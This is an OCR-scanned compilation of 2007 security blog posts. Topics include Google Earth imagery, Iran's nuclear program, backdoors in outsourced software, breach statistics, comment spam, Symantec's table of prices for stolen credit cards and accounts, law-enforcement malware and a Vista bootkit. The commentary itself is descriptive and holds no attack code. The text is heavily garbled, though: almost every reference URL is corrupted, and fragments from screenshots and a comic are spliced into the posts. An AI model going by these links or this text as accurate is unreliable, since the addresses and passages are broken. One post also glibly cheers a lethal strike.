the top 10 naked people on Google Earth, but this 

screenshot is spooky as [2]the guy is even looking straight 
into the sky which makes it even more interesting catch. It 
proves ones thing, Google are capable of providing high-res 
satellite imagery, which they aren't on a mass scale for 

the time being. Shall we speculate on the possible reasons 
why is this guy looking above, remotely controlled aerial 

surveillance device, but what's the relation with Google Maps 
whatsoever? More at [3]Google Blogoscoped, as well 

as in [4]previous [5]posts related to the [6]topic. 





1. http:// aooa lesi a htseein a .com/2006/ll/28/top-lQ-naked- 
peoole-on- a oo a le-earth/ 

2 . 

http://maps. a oo a le.com/maps? 

f=q&hl=en&am p: amp: amp:q = 15.298683 +19.42965 l&la ver 
= &ie=UTF8&z = 23&ll = 15.298684 . 

19.42965 l&spn=0.001291 . 0.002698&am p:amp:amp: t=k&o 
m=l&iw 


3. http://blo a .outer-court.com/archive/2007-03-Q7-nl2.html 

4. http://ddanchev.blo as pot.com/2006/04/threat-b v-aooale- 
earth-has- i ust.html 

5. http://ddanchev.blo as pot.com/2006/07/open-source-north- 
korean-imint.html 

6. http://ddanchev.blo as pot.com/20Q6/01/securit v-q uotes- 
fsb-successor-to-k a b.html 
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Timeline of Iran's Nuclear Program (2007-03-12 
23:30) 


Iran's a rising star these days. It's not just that the country 
recently launched it's [ljfirst missile into space de¬ 
spite efforts of the international community to ban its 
nuclear program, [2]got caught into obtaining sensitive 

military technology, is currently [3]helping the 
enemies(Hezbollah) of its enemies(the U.S) but also, have 
[4]Russia 

enriching their uranium in between legally [5]supplying 
them with technology and upgrade parts the U.S put [6]an 
em¬ 
bargo on - business as usual. Here's a very [7]in-depth and 
informative timeline of Iran's entire nuclear program saga : 





" The Bush Administration has almost certainly not approved 
the timing of military operations against Iran, 

and consequently any projection of the probable timing of 
such operations is neccessarily speculative. The election 

of Mahmoud Ahmadi-Nejad as Iran's new president would 
appear to preclude a negotiated resolution of Iran's 

nuclear program. The success of strikes against Iran's WMD 
facilities requires both tactical and strategic surprise, so 
there will not be the sort of public rhetorical buildup in the 
weeks preceeding hostilities, of the sort that preceeded the 
invasion of Iraq. To the contrary, the Bush Administration will 
do everything within its power to deceive Iran's 

leaders into believing that military action is not imminent. " 

Here's another timeline, this time of [8]U.S-lran contracts 
from 1979 until today. 

1 . 

http://todav.reuters.co.uk/news/articlenews.aspx? 
tv pe=scii encel\lews&storvlD=2007-02- 
25T102434Z 01 BLA533629 

RTRIDST 0 SCIENCE-IRAN-SPACE- 

DC.XML&WTmodLoc=Sci Health 

2. http://ddanchev.blo as pot.com/20Q7/01/transferrin a- 
sensitive-militarv.html 

3. http://ddanchev.blo as pot.com/2006/09/hezbollahs-use-of- 
unmanned-aerial.html 


4. 

http://www.iranian.ws/iran news/publish/article 20954.shtml 


















5. http://www.isn.ethz.ch/news/sw/details.cfm?ID= 17247 


6 . 

http://www.timesonline.co.uk/tol/news/world/us_and america 

s/arti clel490128 .ece 

7. http://www. a lobalsecuritv.or a /militar v/o ps/iran- 
timeline.htm 


8. http://www.cfr.or a/ publication/12806/timeline.html? 
breadcrumb=%2F 
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Threats of Using Outsourced Software - Part Two 
( 2007 - 03-14 17 : 23 ) 

[l]Continuing the [2]coverage on the U.S government's 
[3]overall paranoia of using outsourced software on DoD 

computers, even hardware - [4]firmware infections are still in 
a spy's arsenal only - in a recent move by the Defense 

CIO office a tiger team has been [5]officially assigned to 
audit the software and look for potential backdoors : 

11 The Pentagon is fielding a task force charged with testing 
software developed overseas, according to a De- 















fense Department official. The "tiger team," organized within 
the Defense CIO's office, is ready to move to the 

implementation stage, said Kristen Baldwin, deputy director 
for software engineering and systems assurance in the 

Office of the Undersecretary of Defense for Acquisition, 
Technology, and Logistics. Baldwin spoke yesterday at the 

DHS-DOD Software Assurance Forum in Fairfax, Va. "Tiger 
team" is a software-industry term for a group that conducts 

penetration testing to assess software security. "Success 
means they understand where their focus needs to be and 

how to prioritize their efforts," Baldwin said. "They 
understand the supply-chain impact on systems engineering, 
and 

are ready to move forward in an effort to mitigate assurance 
risk." 11 

There's another perspective you should keep in mind. 

Looking for backdoors is shortsighted, as the software 

may come vulnerabilities-ready, so prioritizing whether it's 
vulnerabilities or actualy backdoors to look for will prove 
tricky. The use of [6]automated source code auditing may 
prove valuable as well, but taking into consideration 

the big picture, if you were to track the vulnerabilities that 
could act as backdoors in U.S coded software - taking 

Windows for instance - compared to that of foreign software, 
you'll end up with rather predictable results. 

The bottom line, does shipping an insecure software has to 
do with source code vulnerabilities, or should the 



threat be perceived in relation to backdoor-shipped software? 
The true ghost in the shell however remain the 

yet undiscovered vulnerabilities in the software acting as 
vectors for installing backdoors, not the softwared itself 

shipped backdoor-ready. [7]Meanwhile, [8]are stories like 
[9]these [10]a violation of [ll]OPSEC by [12]themselves? 

I think they are. 

1. http://ddanchev.blo as pot.com/20Q7/Ql/threats-of-usin a- 
outsourced-software.html 

2. http://ddanchev.blo as pot.com/2006/05/espiona ae-a hosts- 
busters.html 

3. http://ddanchev.blo as pot.com/2006/Q5/health v- 
paranoia.html 

4. 

http://news.com.com/PC-l-hardware-l-can-l-pose-l-rootkit-l-thre 
at/2100-7349 3-6162924.html 

5. http://www. a cn.com/online/voll_nol/43279-l.html 

6. http://ddanchev.blo as pot.com/2007/02/autonnated- 
detection-for-patterns-Qf.html 

7. http://www.fcw.com/article94020-04-10-Q6-Web 

8 . 

http://www.there a ister.co.uk/2007/02/26/windows boxes at 
sea/ 

9. 

http://www.dod.mil/dfas/more/defensemil pa vofficesoftware.ht 

ml 




























10 . 

http://www.there a ister.co.uk/2004/09/06/ams g oes windows 
for warships/ 

11 . 

http://en.wikipedia.or g /wiki/Operations_securitv %280PSEC 
%29 


12 . 

http://www.dodccrp.or a /events/2004/CCRTS San Die a o/CD/ p 
a pers/086.pdf 
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Complexity and Threats Mind Mapping (2007-03-19 
16:42) 

The folks at Security-Database.com - who by the way 
expressed their excitement over my blog - just released an 

































outstanding [l]mind mapping graph on the most common 
firefox security extensions used for various purposes 

starting from information gathering, and going up to data 
tampering : 

11 FireCAT is based upon a paper we wrote some weeks before 
(Turning firefox to an ethical hacking platform) 

and downloaded more than 25 000 times. We also thank all 
folks that encouraged us and sent their suggestions 

and ideas to make this project a reality. This initial release is 
presented as a mindmap and we are open to all your 

suggestions to make it a really good framework for all the 
community of security auditors and ethical hackers. We 

will make a special page for this framework soon to let you 
monitor this activity. 11 
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Great idea, reminds of [2] Ollie Whitehouse's excellent mind 
mapping of mobile device threats. The semantics of 

security when applied in a visualized manner have the 
potential to limit the "yet another malware variant in the 
wild" 

type of news articles, or hopefully help the mainstream 
media break out of the "echo chamber" and re-publishing 





myopia, thus covering the basics. 

Anyway, which is the most useful tool you'll ever encounter? 
It's called experience . Which is the most impor¬ 
tant threat to keep an eye on? It's your inability of not 
knowing what's going on at a particular moment, lack of 

situational awareness . 

1. http://www.securitv-database.com/toolswatch/Securit v- 
Database-releases-FireCAT.html 

2 . 

http://www.svmantec.com/enterprise/securitv resoonse/webl 
oa /2007/02/a picture is worth a thousand.html 
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Personal Data Security Breaches Spreadsheet (2007- 
03-19 17:30) 

[l]Some stats try [2]to emphasize on the number of people 
affected while forgetting the key points I outlined in 

a previous post related to [3]why we cannot measure the real 
cost of cybercrime, and yes, duplicates among the 

affected people in any of the statistics available. The number 
of people affected will continue to rise, but that's not 
important, what's important is to identify the weakest link in 
this process, and for the time being, you're a 11 data hostage 11 
in order to enjoy your modern lifestyle - ever asked yourself 
[4]what's gonna happen with your digital data after you're 
gone? 











[5]Spreadsheet nerds, here's something worth taking the 
time to around with, most importantly this huge 

dataset debunks the common myth of hackers taking the 
credit for the majority of personal data security breaches, 

whereas as you can see in the figures, on the majority of 
occasions - and it's an ongoing trend - companies 

themselves should get into the spotlight: 

11 On average, in 2005 personal records were compromised at 
a rate of 5.2 million a month. On average, in 

2005 personal records were compromised at a rate of 5.8 
million a month. Assuming a similar rate of growth, by 

November or December this year we we should cross the 2.0 
billion mark. This is a conservative estimate because 

many of the news stories we archived were conservative on 
their own estimates of how many records were lost in 

particular incidents, and because a small number of 
incidents are reported without details of how many personal 

records were compromised. 
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View [6]figures and tables of this paper as a *.pdf. View pre¬ 
publication [7]draft of paper as a *.pdf. View [8]dataset of 
incidents as a *.xls. View University of Washington Press 
office [9]news release on this research. 11 

Graphic presenting the risk of identity theft in the U.S only, 
based on the severity of data breaches, courtesy of the 
Danny Dougherty . 



1. http://ddanchev.blo as pot.com/2006/01/personal-data- 
securitv-breaches.html 


2. http://ddanchev.blo as pot.com/20Q6/ll/chart-of-personal- 
data-securitv.html 

3. http://ddanchev.blo as pot.com/2006/01/whv-we-cannot- 
measure-real-cost-of.html 

4. http://ddanchev.blo as pot.com/2006/09/afterlife-data- 
privacv.html 

5. http://www.wiareport.or g /index. ph p/43/6-miNion-personal- 
records-compromised-each-month-2-biHlion-in-tota 

l-b v-december# more-43 

6 . 

http://www.wiareport.Or g /documents/ i cmcfi a uresandtables. p 


df 


7. http://www.wiareport.or a /documents/ i cmcfull pa per.pdf 

8 . 

http://www.wiareport.or a/s preadsheets/compromisedpersonal 

recordsl980-2006.xls 

9. http://uwnews.washin a ton.edu/ni/article.as p? 
articlelD=31264 
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Spam Comments Attack on TechCrunch Continuing 
(2007-03-19 17:49) 














































In a previous post I commented on [l]0'Reilly.com's war on 
spam according to their statistics, and thought you might 

find the most recent [2]TechCrunch blog spam stats they've 
recently provided, informative as well : 

11 On January 4 we reported that the [3]Akismet filter had 
[4]stopped a million spam comments from reaching 

TechCrunch. At that point we'd been using it for about nine 
months. The number of blocked spam comments is now 

two million, just ten weeks later. That works out to about 
15,000 spam comments hitting TechCrunch every day . If 

we did not have Akismet, we couldn't allow anonymous 
commenting here on TechCrunch. We used to go through all 

spam comments to pick out the occasional false positive and 
accept it. Now, there are just too many to go through. 

All comments marked by Akismet as spam get deleted 
almost immediately. 11 

I turned blog comments off quite a while ago and to be 
honest, the best comments, recommendations and 

tips, as well as people I've met through this blog, I received 
over email and backlinks. Keep 'em coming! Moreover, 

it's not just the inability of service providers to [5]keep up 
with the aggresive generation of splogs, but malicious 

parties are already exploiting some of the fancy features that 
make blogs so flexible when it comes to personalization and 
social networking. Next time [6]Fortinet will come up with 
another advisory, this time discussing MySpace so 



consider it as a cyclical shift from one provider to another 
depending on the current defenses in place - blackhat SEO. 

1. http://ddanchev.blo as pot.com/2006/Q6/dealin a -with- 
s pam-oreillvcom-wav.html 

2. http://www.techcrunch.com/2007/03/17/techcrunch-has- 

15000-spam-comments-per-da v/ 

3. http://akismet.com/ 

4. http://www.techcrunch.com/2007/01/Q4/thank-vou- 
akismet/ 

5. http://ddanchev.blo as pot.com/2006/ll/blo aos phere-and- 
s plo a s.html 

6. http://www.forti a uardcenter.com/advisorv/FGA-20Q7- 
04.html 
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Subconscious Search Monopoly Sentiments (2007-03- 
19 18:26) 

And hey, that's from someone attending the Microsoft MVP 
for N-th time : 

" I was invited to attend the Microsoft MVP Summit last week. 
If you want to know what the Summit is about or 

what a MS MVP is, Google is your friend . " 

Microsoft's MVP is a great corporate citizenship tool, whereas 
empowering and crediting the individual on a 

wide scale compared to internal reputation benchmarking is 
an indirect use of the "act as an owner" management tactic - 




implement it. Supporting existing standarts - look up 
[^interoperability - benefits us all, reinventing 

the wheel without an unique vision besides ever increasing 
(projected) profit margins, wouldn't even benefit the 

company in the long term. 

If you truly want to disrupt, disrupt by first (legally) taking 
the advantage of using someone else's already developed 
foundations to do so, the rest is attitude and hard to 
immitate competitive advantages. [2]Good brainstorming 

questions in Anil's post whatsoever. 

1. http://en.wikipedia.or g /wiki / interoperabilit v 

2 . 

http://www.anilt i .com/blo a /2007/03/17/MicrosoftMVPSummit 

2007Recap.as px 

163 


Item 

Advertised Price 
(lnUSDoflars) 

United States-based credit cardwilh card verification value 

$l-$6 

United Kingdom-based credit card with card verification value 

$2-$12 

An identity (including US bankaccount. credit card dateof birth.and 
government Issued identification number) 

$14-$18 

Ustol 29.000emails 

$5 

Online banking account with a $9,900 balance 

$300 

Yahoo Mail cookie exploit—advertised to facilitate full access when successful 

$3 

Valid Yahoo and Hotmail email cookies 

$3 

Compromised computer 

$6~$20 

Phishing Web site hosting—per site 

$3-5 

Verified PayPal account with balance (balance varies) 

$50-$500 

Unverified PayPal account with balance (balance varies) 

$10-$50 

Skype account 

$12 

World ol Warcraft account—one month duration 

$10 


Table 3. Advertised prices of items traded on underground economy servers 

Source. Symantec Corporation 













The Underground Economy's Supply of Goods (2007- 
03-19 23:17) 

Symantec ([1]SYMC) just released their latest [2]lnternet 
Security Threat Report, a 104 pages of rich on graphs 

observations, according to the data streaming from their 
sensor network : 

11 Volume XI includes a new category: "Underground 
Economy Servers". These are used by criminals and crim¬ 
inal organizations to sell stolen information, including 
government-issued identity numbers, credit cards, bank 
cards 

and personal identification numbers (PINs), user accounts, 
and email address lists. To reduce facilitating identity 

theft, organizations should take steps to protect data stored 
on or transmitted over their computers. It is critical to 
develop and implement encryption to ensure that any 
sensitive data is protected from unauthorized access. 11 

In between their coverage on various segments such as 
vulnerabilities, phishing, spam, and yes malware de¬ 
spite that I'm having my doubts on SMTP as the major 
propagation vector on a worldwide scale, I came across to a 

nice figure summarizing their encouterings while browsing 
around various forums and web sites. 

The question is - why are these underground goods cheaper 
than a Kids' menu at McDonalds as I've once 

pointed out at O'Reilly's Radar post on [3]spamonomics? 
Because in 2007 we can easily speak of 11 malicious 



economies of scale 11 thus, profit margin gains despite the 
ongoing [4]zero day vulnerabilities cash bubble at certain 
forums, doesn't seem to be that very important. So can we 
therefore conclude that greed isn't the ultimate driving 

force, but trying to get rid of the stolen information in the 
fastest way possible in between taking into consideration its 
dissapearing exclusiveness with each and every minute? The 
principle goes that a dollar earned today is worth 

more than a dollar earned tomorrow, but how come? Simple, 
by tomorrow the exclusiveness of your goods might 

by just gone, because the affected parties detected the leaks 
and took actions to prevent the damage. 

Issues to keep in mind regarding the graph: 


Harvested spam databases have been circulating around for 
years and so turned into a commodity, for instance, 
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I often come across geographically segmented databases or 
per email provider segmented ones, not for sale, but for free. 
So how come the "good" is offered for free? It's obviously fine 
for the "good" to be offered for free when there's a charge for 
service, the service of verifying the validity of the emails , 
the service of encoding the message in a way to bypass anti 
spam filters , and the service of actually sending the 
messages 


Where's the deal of a malicious party when selling an online 
banking account with a $9,900 balance for just $300? 



For me, it's a simple process of risk-forwarding to a party that 
is actually capable of getting hold of the cash 


Yahoo and Hotmail email cookies per piece? Next it will be an 
infected party's clickstream for sale , and you'll have 

the malicious parties competing with major [5]ISPs who are 
obviously selling yours for the time being. 


Compromised computers per piece? Not exactly. [6]Entire 
botnets or the utilization of the possible services offered 

on demand for a price that's slightly a bit higher than the 
one pointed out here. 

Psychological imagation is just as important as playing a 
devil's advocate to come up with scenario building tactics in 
order to protect your customers and yourself from tomorrow's 
threats. 

Related images: 


[7]surveying potential buyers of zero day vulnerabilities in 
order to apply marginal thinking in their proposition 


advertisement for [8]selling zero day vulnerabilities 


listing of [9]available exploits 



[10]zero day vulnerabilities [ll]shop, I'm certain it's a 
[12]PHP module that's currently hosted somewhere else 


[13]the WebAttacker toolkit 

- [14]The RootLauncher 

- [15]The Nuclear Grabber and [16]geolocated infections- 
site dissapeared already 

1. http://finance. a oo a le.com/finance?a = Symantec 

2. http://www.svmantec.com/enterprise/theme. isp? 
themeid=threatreport 

3. 

http://radar.oreillv.com/archives/2007/01/spamonomics 101. 
html 

4. http://ddanchev.blo as pot.com/2007/01/zero-da v- 
vulnerabillities-cash-bubble.html 

5. http://slashdot.or g /articles/07/03/16/1958211.shtml 

6. http://www.linuxsecuritv.com/docs/malware-trends.pdf 
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7. 

http://photosl.blo aa er.com/blo aa er/1933/1779/1600/0da v s 
urvev.l. pna 

8 . 

http://photosl.blQ aa er.com/blo aa er/1933/1779/1600/xsho p 




























2QQ5. jpg 


9. 

http://photosl.blQ aa er.com/blo aa er/1933/1779/1600/WebAtt 

ackerl.O. pna 

10 . 

http://photosl.blo aa er.com/blo aa er/1933/1779/1600/lnterna 
tional Exploits Shop.l. ipg 

11 . 

http://photosl.blo aa er.com/blo aa er/1933/1779/1600/lnterna 
tional_Exploits_Shop%20-%20Products2. i pg 

12 . 

http://photosl.blo aa er.com/blo aa er/1933/1779/1600/lnterna 
tional_Exploits_Shop%20-%20Productsl. i pg 

13. 

http://4.bp.blo as pot.com/ wlCHhTiOmrA/Rd4wewilS9l/AAAA 
AAAAASw/dfai0Vk9Zul/sl600-h/webattacker. ipa 

14. 

http://2.bp.blo as pot.com/ wlCHhTiOmrA/Rd4vVOilS8l/AAAA 
AAAAASo/ODGIkHdb61o/sl600-h/rootkit launcher. ipg 

15. 

http://photosl.blo aa er.com/blo aa er2/4099/2257/1600/nucle 

arl. pna 

16. 

http://photosl.blo aa er.com/blo aa er2/4099/2257/1600/adm2 

,nng 
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ASCII Art Spam (2007-03-20 16:45) 


A [l]spammer's biggest trade off - making it through anti¬ 
spam filters doesn't mean the email receipt will even get 

the slightest chance of understanding what he's about to get 
scammed with. 

11 We have seen SPAM using [2]ASCII ART in order to avoid 
being detected by antispam filters. Most of the times, they 
try to show different words (Viagra, etc.) using this 
technique, but this is the first time I have seen them showing 
a picture. It is not a very high quality one, but I've tried it 
with some different antispam filters and they have been 
fooled. 11 

Here's an [3]old school ASCII generator you can play around 
with, and a [4]related image from a previous post 



on [5]overperforming spammers. 


1. 

http://blo as. Dandasoftware.com/blo as/ pandalabs/archive/20 

07/03/14/Sex-in-ASCII.as px 

2. http://en.wikipedia.or a /wiki/ASCII_art 

3. http://www.network-science.de/ascii/ 

4. 

http://photosi.blo aa er.com/blo aa er/1933/1779/200/Spam. ip 

9 

5. http://ddanchev.blo as pot.com/2006/06/over-performin a- 
s pammer.html 
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K 53S - Update 
Update: running 


Downloading: 

Location: 


Update size: 
Traffic: 
Transfer rate: 


JSLJi4 ^ 1 W '' J jLi. 


3.3 MB Start time: 

1.3 MB Duration: 


10.6-4 Kb/s 


Rmsh time: 


11/27/2006 21:56:26 
00:02:53 

11/27/2006 22:01:47 


Events 


Settings 


Event 

Object Name 

Time 

Traffic * 

Q File downloaded 

diffe 'bases /as .bis /profiles .pdb. aoo 

11/27/2006 21:58:29 

997 byte 

Q File downloaded 

bases/ids/6b/ids00I4f.kdz 

11/27/2006 21:53:33 

141.0 KB 

File downloaded 

bases/ids/6b/idsbase. kdz 

11/27/2006 21:58:44 

295.2 KB 

File downloaded 

bases ; ’)ds/6bjWcr .kdz 

11/27/2006 21:53:48 

32.5 KB 

File downloaded 

bases/ds/6b/Wf ,v. kdz 

11/27/2006 21:58:52 

48.2 KB 

^ File downloaded 

bases,«ds/6b/klick.kdi 

11/27/2006 21:53:56 

110.2 KB 

Q Rle downloaded 

bases/ids/6b/Win.kdz 

11/27/2006 21:59:05 

96.7 KB 

Q File downloaded 

bases/ids/6b/idstm.kdz 

11/27/2006 21:59:11 

31.4 KB □ 

Q File downloaded 

bases :ib5/6b/ckah. set 

11/27/2006 21:59:13 

637byteil 

Q File downloaded 

bases/aso v/aphish. da t 

11/27/2006 21:59:17 

31.3KB - 

4 | 

w 


► 


E3 Show all events 


Actions... 




fc. Help 


BramjneT. 


om 


Save As... 


Close 


Jihadists Using Kaspersky Anti Virus (2007-03-20 
17:01) 

I wonder what are the low lifes actually protecting 
themselves from? Malware attacks in principle, or preparing 

to prevent a [l]malware infection courtesy of an unamed law 
enforcement agency given their interest in coding 

malware : 

II German police officials have expressed interest in 
developing software tools to help them surveil computer 










































users who may be involved in crime. The tools might include 
types of software similar to those used in online fraud 


and theft schemes, such as programs that record keystrokes, 
logins and passwords. Security companies, however, 

are asserting that they wouldn't make exceptions to their 
software to accommodate, for example, Trojan horse 

programs planted by law enforcement on users' computers. 


This is a very contradictive development that deserves to be 
much more actively debated around the industry 

than it is for the time being. Law enforcement agensies and 
intelligence agencies have always been interested in zero 

day vulnerabilities and firmware infections, thus gaining a 
competitive advantage in the silent war. Among the most 

famous speculations of an intelligence agency using 
malicious code for offensive purposes is the infamous [2]CIA 

infection/logicbomb of Russian gas pipeline : 

11 While there were no physical casualties from the pipeline 
explosion, there was significant damage to the So¬ 
viet economy. Its ultimate bankruptcy, not a bloody battle or 
nuclear exchange, is what brought the Cold War to 

168 

an end. In time the Soviets came to understand that they 
had been stealing bogus technology, but now what were 



they to do? By implication, every cell of the Soviet leviathan 
might be infected. They had no way of knowing which 

equipment was sound, which was bogus. All was suspect, 
which was the intended endgame for the operation. The 

faulty software was slipped to the Russians after an agent 
recruited by the French and dubbed "Farewell" provided a 
shopping list of Soviet priorities, which focused on stealing 
Western technology. " 

Excluding the spy thriller motives, nothing's impossible the 
impossible just takes a little while, and the same 

goes for [3]SCADA devices vulnerabilities and [4]on 
purposely shipping buggy software. Anti virus vendors will 
get 

even more pressure trying to protect their customers from 
not only the malware released by malware authors, but 

also from the one courtesy of law enforcement agencies. 
[5]Cyber warfare is here to stay, [6]no doubt about it, but 

using malware to monitor suspects will perhaps prompt them 
to keep an eye on the last time their AV software got 

updated, and still keep pushing the update button in 
between. 

1 . 

http://www.computerworld.com.aU/index. ph p/id : 596622433 : 

fp: 41943Q4 :foid:l 

2 . 

http://news.zdnet.co.Uk/software/0 . lQ00000121 . 39147917 .0 

O.htm 











3. http://ddanchev.blo as pot.com/2006/10/scada-securit v- 
inddents-and-critical.html 

4. http://scadahonevnet.sourcefor a e.net/ 

5. http://ddanchev.blo as pot.com/2006/07/north-koreas- 
c vber-warfare-unit-121.html 

6. http://ddanchev.blo as pot.com/2006/05/whos-who-in- 
c vber-warfare.html 
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Video on Analyzing and Removing Rootkits (2007-03- 
20 20:17) 

Courtesy of [l]WatchGuard 

part three of their malware analysis series walks you through 
various commercial and free utilities for detecting and 

removing rootkits : 

11 In this episode, Corey and his Magic White Board show how 
kernel mode rootkits work. Also covered: rec¬ 
ommended tools and techniques for detecting and removing 
rootkits. " 

[EMBED] 

1. http://finance. a oo a le.com/finance?q=WatchGuard 
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A Fortune 500 Blogosphere? Not Yet (2007-03-20 
23:49) 


[l]Enterprise 2.0 is slowly [2]gaining grounds and you 
cannot deny it despite top management's neutral position on 

yet another major M [3]Reengineering of the Corporation". 
Supply chain management was perhaps among the first 
departments to really utilize the power of real-time 
information, and interoperable data standarts - a mashup-ed 

ecosystem - but improving your employees productivity 
through Web 2.0 tools such as intranet blogs and wikis 

remains just as unpopular as actual Fortune 500 companies 
blogging? But how come? Lack of evangelists? Not at all. 

There's one minor obstacle, you cannot teach an old dog new 
tricks, unless of course you dedicate extra investments 















into training him, which is exactly what I feel is happening at 
the corporate stage - everyone's patiently waiting [4]for the 
concepts to mature before training and implementation 
[5]happen for real. What's the current attitude towards 



external Web 2.0 activities? A Fortune 500 blogosphere isn't 
emerging as fast as the mainstream one is according to 

the [6]Fortune 500 Business Blogging Wiki : 

11 a directory of Fortune 500 companies that have business 
blogs, defined as: active public blogs by company 

employees about the company and/or its products. 

According to our research, 40 (8 %) of the Fortune 500 


blogging as of 10/05/06. The navigation sidebar to the right 
lists all the Fortune 500 companies. The list below are the 
ones that we've found so far that have public blogs as 
defined above. Please help us by entering data on 

those we've missed. ONLY Fortune 500 companies, 
please. If you're not sure if it's on the F500 list (it includes 
US 

companies only), check the sidebar. If it's not there, consider 
adding it to the [7]Global 1,000 Business Blogging page 
instead. 11 

I think the main reason behind this are the inevitable 
channel conflicts that will arise from let's say Pfizer's 

blogging compared to using the services of their traditional 
advertising and PR agencies - I also imagine a links 

density analysis of their blog indicating the highest % of 
links pointing to Erowid.org. But ask yourself the following, 
what if these very same agencies start offering bloggers-for- 
hire in their portfolio of services, would the big guys get 
interested then? Or when will they [8]start understanding 
the [9]ROI of blogging? 



1. http://www.enterprise2conf.com/ 
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2 . 

http://www.businessweek.com/technolo a v/content/ i un2006/t 
C20060605 424102.htm 

3. http://www.amazon.com/Reen a ineerin a -Corooration- 
Manifesto-Business-Revolution/dp/088730687X 

4. http://en.wikipedia.or g /wiki/Enterprise_social_software 

5. http://www.enterpriseweb2.com/?p=10 

6. http://www.eu.socialtext.net/bizblo a s/index.c ai 

7. http://www.eu.socialtext.net/bizblo a s/index.c ai? 
a loballOOObusinessblo aaina 

8 . 

http://blo a s.forrester.com/charleneli/2006/10/calculatin a the 
■ html 

9. 

http://blo a s.forrester.com/charleneli/2007/01/new roi of blo 
g .html 
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USER FRIENDLY by J.P. "Hllad" Frazer 



ITS ABOl/T WINDOWS VISTA. 
BILL. WE HAVE PROBLEMS. 

I 

IT SEEMS MARKETING HAS 
MESSED C/P A BIT ON THE 
SLOGANS FOR SOME 
OF THE FEATURES. 


CIH OH. HOW SO? 




LET ME OFFER 
AN EXAMPLE; 


"WINDOWS VISTA 
SECURITY: FINALLY A 
LOCKED DOOR FOR 
YOU R CORNFIELD/" 


Unsigned Code Execution in Windows Vista (2007-03- 
21 23:01) 

Nitin Kumar and Vipin Kumar are about to [l]present the 
Vbootkit at the upcoming [2]Blackhat and [3]HITB cons : 

11 We have been recently researching on Vista. Meanwhile, 
our research for fun lead us to some important 

findings. Vista is still vulnerable to unsigned code 
execution.vbootkit is the name we have chosen ( V stands for 
Vista and boot kit is just a termed coined which is a kit which 
lets you doctor boot process), vbootkit concept presents 

how to insert arbitrary code into RC1 and RC2, thus 
effectively bypassing the famous Vista policy for allowing 
only 

digitally signed code to be loaded into kernel . The presented 
attack works using the custom boot sectors.Custom 

boot sector are modified boot sectors which hook booting 
process of the system & thus, gains control of the system. 

Meanwhile, the OS continues to boot and goes on with 
normal execution. 11 








Vulnerabilities are an inevitable commodity, they will always 
appear and instead of counting them on an OS 

or software basis, consider a vendor's response time while 
following [4]the life of the security threat. I never actually 
liked the idea of an insecure OS, to me there're well 
configured and badly configured OSs in respect to security, 
but 

then again if you're a monocultural target the way Microsoft 
is, you'll always be in the zero day spotlight. A security 
breach will sooner or later hit your organization, don't talk, 
act and pretend you're 100 % secure because you cannot 

be. Instead a little bit of proactive measures balanced with 
contingency planning to minimize the impact is what 

should get [5]a high priority in your strategy. Here's a 
[6]related post. 

Cartoon courtesy of [7]Userfriendly.org 

1. http://rootkit.com/newsread orint. ph p?newsid = 671 

2. http://www.blackhat.com/html/bh-europe-07/bh-eu-Q7- 
schedule.html 

3. http://conference.hitb.or a /hitbsecconf2007dubai/ 

4. http://ddanchev.blo as pot.com/20Q7/01/life-of-securit v- 
threat.html 

5. http://ddanchev.blo as pot.com/2006/Q5/valuin a -securit v- 
and-prioritizin a- vour.html 

6. http://ddanchev.blo as pot.com/2006/Q3/5-thin a s-microsoft- 
can-do-to-secure.html 























7. http://www.userfriendlv.or g/ 
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A Documentary on CCTVs in the U.K (2007-03-21 
23:48) 

[l]Every breath you take, every move you make, I'll be 
watching you. Used to be a great song, but has a disturbing 

context these days. Nino Leitner's [2]EveryStepYouTake 
documentary on the state of surveillance in the U.K will 

premier this month, and I suspect the full version will be 
[3]made available for the world to see too : 

11 Trying to answer questions like these, Nino Leitner's one- 
hour documentary "EVERY STEP YOU TAKE" digs 

deep into an entirely British phenomenon: nation-wide video 
surveillance. It features formal interviews with the 

surveillance researcher Professor Clive Norris, Deputy Chief 
Constable Andy Trotter from the British Transport Police, a 
representative of Britain's largest civil rights group Liberty, a 
CCTV manager from a public local CCTV scheme, 



experts in the field of transport policing and many more. The 
surveillance reality in Britain is compared with another 
member of the E.U., Austria. Compared to the UK, it can be 
seen as a developing country in terms of CCTV, but just 

as elsewhere all over the world, politicians are eager to 
extend the surveillance gaze. 


Here's an animation to help you [4]explain what surveillance 
means to your cat, another one [5]fuIly loaded 

with attitude, and let's not exclude [6]the big picture. 

Related posts: 

[7] London's Police Experimenting with Head-Mounted 
Surveillance Cameras 

[8] Head Mounted Surveillance System 

[9] Eyes in London's Sky - Surveillance Poster 

[10] External links 

1. http://en.wikipedia.or g /wiki/Everv Breath You Take 

2. http://www.evervste p voutake.or g/ 

3. http://www. g uba.com/watch/300003Q347 

4. http://www.voutube.com/watch?v= il TLLlU i vfU 

5. http://www.eff.or g /Privacv/Monsters/ 

6. http://ddanchev.blo QS POt.com/2007/03/documentarv-on- 
echelon-s py-s vstem.html 























7. http://ddanchev.blo as oot.com/2006/ll/londons-police- 
exoenmentin a -with-head.html 

8. http://ddanchev.blo as pot.com/20Q7/01/head-mounted- 
surveillance-svstem.html 
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9. http://ddanchev.blo as pot.com/2007/01/eves-m-londons- 
sk v-surveillance-poster.html 

10. http://del.icio.us/DDanchev/Privac v 
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Zoom Zoom Zoom - Boom! (2007-03-22 00:04) 

If you could only eradicate the radicalization of immature 
islamic youth over the Internet with the push of a button. 

Great surgical shot! 

[EMBED] 
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Tricking an UAV f s Thermal Imagery (2007-03-22 
20:41) 

Give me a hug so that we [l]become "thermally one" for the 
thermal paparazi to see. When you know how it works you 
can either improve, abuse or destroy it. Very interesting 
abuse of technology by the people knowing how it works : 

" The Marines cuffed Awad and took him to a nearby bomb 
crater. At this point the drone approached for its 

first pass overhead. One of the group moved forward and dug 
a hole at the crater, while the others posed with Awad 

behind a wall. The recorded thermal imagery from the aircraft 
seemed to show troops watching an insurgent digging 

by the road, perhaps to place a bomb. After the drone had 
passed, the group moved Awad forward to the hole. But 

at this point the surveillance platform returned, so one of the 
Marines wrapped himself around Awad so as to create 

a single thermal signature, disguising the captive's presence. 


If you're under thermal surveillance a cold shower's your 
invisibility coat if one's available. [2]Wired has some 

photos on this story. 

1 . 

http://www.there a ister.co.uk/2007/03/22/murder marines fo 
ol drone/ 


2. http://www.wired.eom/news/technolo a v/0 . 73012-0.html 
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Take this Malicious Site Down - Processing Order.. 
(2007-03-22 21:00) 

Yet another pay-pal-secure-login.tld domain gets registered, 
and [l]even more ironic in its directory listings you'll 

be able to digg out several other financial institutions and 
